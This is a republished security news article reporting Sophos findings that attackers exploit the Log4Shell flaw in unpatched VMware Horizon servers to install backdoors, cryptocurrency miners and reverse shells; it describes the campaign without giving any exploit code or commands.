Regístrese ahora para una mejor cotización personalizada!

Log4Shell exploited to infect VMware Horizon servers with backdoors, crypto miners

Mar, 29, 2022 Hi-network.com

The Log4Shell vulnerability is being actively exploited to deliver backdoors and cryptocurrency miners to vulnerable VMware Horizon servers.

On Tuesday, Sophos cybersecurity researchers said the attacks were first detected in mid-January and are ongoing. Not only are backdoors and cryptocurrency miners being deployed, but in addition, scripts are used to gather and steal device information.

Log4Shell is a critical vulnerability in Apache Log4J Java logging library. The unauthenticated remote code execution (RCE) vulnerability was made public in December 2021 and is tracked as CVE-2021-44228 with a CVSS score of 10.0.

Researchers have warned that Log4Shell is likely to continue for years, especially considering the bug's simple exploitation.

Microsoft previously detected Log4Shell attacks conducted by state-sponsored cybercriminals, but most appear to focus on cryptocurrency mining, ransomware, and bot activities. A patch was released in December 2021, but as is often the case with internet-facing servers, many systems have not been updated.

According to Sophos, the latest Log4Shell attacks target unpatched VMware Horizon servers with three different backdoors and four cryptocurrency miners.

The attackers behind the campaign are leveraging the bug to obtain access to vulnerable servers. Once they have infiltrated the system, Atera agent or Splashtop Streamer, two legitimate remote monitoring software packages, may be installed, with their purpose twisted into becoming backdoor surveillance tools.

The other backdoor detected by Sophos is Silver, an open source offensive security implant released for use by pen testers and red teams.

Sophos says that four miners are linked to this wave of attacks: z0Miner, JavaX miner, Jin, and Mimu, which mine for Monero (XMR). Previously, Trend Micro found z0Miner operators were exploiting the Atlassian Confluence RCE (CVE-2021-26084) for cryptojacking attacks.

Security

Cyber security 101: Protect your privacy from hackers, spies, and the government

Simple steps can make the difference between losing your online accounts or maintaining what is now a precious commodity: Your privacy.

Read now

A PowerShell URL connected to this both campaigns suggests there may also be a link, although that is uncertain.

"While z0Miner, JavaX, and some other payloads were downloaded directly by the web shells used for initial compromise, the Jin bots were tied to the use of Sliver, and used the same wallets as Mimo -- suggesting these three malware [strains] were used by the same actor," the researchers say.

In addition, the researchers uncovered evidence of reverse shell deployment designed to collect device and backup information.

"Log4J is installed in hundreds of software products and many organizations may be unaware of the vulnerability lurking in within their infrastructure, particularly in commercial, open-source or custom software that doesn't have regular security support," commented Sean Gallagher, Sophos senior security researcher. "And while patching is vital, it won't be enough if attackers have already been able to install a web shell or backdoor in the network."

Previous and related coverage

  • Log4j update: Experts say log4shell exploits will persist for 'months if not years'
  • Log4j flaw: Attackers are targeting Log4Shell vulnerabilities in VMware Horizon servers, says NHS
  • Log4Shell flaw: Still being used for crypto mining, botnet building... and Rickrolls

Have a tip?Get in touch securely via WhatsApp Signal at +447713 025 499, or over at Keybase: charlie0


Security

8 habits of highly secure remote workersHow to find and remove spyware from your phoneThe best VPN services: How do the top 5 compare?How to find out if you are involved in a data breach -- and what to do next
  • 8 habits of highly secure remote workers
  • How to find and remove spyware from your phone
  • The best VPN services: How do the top 5 compare?
  • How to find out if you are involved in a data breach -- and what to do next

tag-icon Etiquetas calientes: tecnología seguridad

Copyright © 2014-2024 Hi-Network.com | HAILIAN TECHNOLOGY CO., LIMITED | All Rights Reserved.